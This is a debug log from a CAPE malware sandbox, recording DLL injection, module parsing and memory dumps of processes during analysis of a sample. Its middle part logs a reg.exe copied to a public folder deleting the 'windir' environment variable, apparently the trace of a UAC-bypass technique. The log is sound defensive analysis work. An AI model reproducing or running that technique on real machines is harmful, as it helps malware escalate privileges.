2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ktmw32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ktmw32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\taskschd.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\taskschd.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mstask.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mstask.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\secur32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\secur32.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\credssp.dll
2020-03-24 10:13:33,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\credssp.dll
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00E00000
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00E17683
2020-03-24 10:13:33,869 [root] DEBUG: Module image dump success
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xe00ffc, size: 0x310
2020-03-24 10:13:33,869 [root] DEBUG: getApiByVirtualAddress :: There is a api resolving bug, VA: 754B3E61
2020-03-24 10:13:33,869 [root] DEBUG: -> Possible API: GlobalFree ord: 348
2020-03-24 10:13:33,885 [root] DEBUG: -> Possible API: LocalFree ord: 428
2020-03-24 10:13:33,885 [root] DEBUG: IAT parsing finished, found 170 valid APIs, missed 0 APIs
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ktmw32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ole32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:33,917 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:33,917 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:33,917 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2212_137784774453132024232020
2020-03-24 10:13:35,898 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2212.dmp.
2020-03-24 10:13:35,898 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:35,898 [root] DEBUG: DLL unloaded from 0x74340000.
2020-03-24 10:13:35,898 [root] INFO: Notified of termination of process with pid 2212.
2020-03-24 10:13:35,914 [root] INFO: Announced 32-bit process name: reg.exe pid: 2192
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:35,930 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:35,930 [root] DEBUG: Loader: Injecting process 2192 (thread 2896) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,930 [root] DEBUG: Process image base: 0x00B90000
2020-03-24 10:13:35,930 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,944 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:35,944 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,944 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2020-03-24 10:13:35,960 [root] INFO: Announced 32-bit process name: reg.exe pid: 2192
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:35,976 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:35,976 [root] DEBUG: Loader: Injecting process 2192 (thread 2896) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,976 [root] DEBUG: Process image base: 0x00B90000
2020-03-24 10:13:35,976 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,992 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:35,992 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,992 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2020-03-24 10:13:35,992 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:35,992 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:36,007 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:36,007 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:36,007 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:36,007 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:36,023 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2192 at 0x74880000, image base 0xb90000, stack from 0x256000-0x260000
2020-03-24 10:13:36,023 [root] DEBUG: Commandline: C:\Users\Public\reg  delete hkcu\Environment \v windir \f.
2020-03-24 10:13:36,023 [root] INFO: Added new process to list with pid: 2192
2020-03-24 10:13:36,023 [root] INFO: Monitor successfully loaded in process with pid 2192.
2020-03-24 10:13:36,023 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2192
2020-03-24 10:13:36,039 [root] DEBUG: GetHookCallerBase: thread 2896 (handle 0x0), return address 0x00B91CAD, allocation base 0x00B90000.
2020-03-24 10:13:36,039 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2192.dmp.
2020-03-24 10:13:36,039 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00B90000.
2020-03-24 10:13:36,039 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:36,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,226 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,335 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:36,365 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:36,428 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:36,444 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:36,476 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
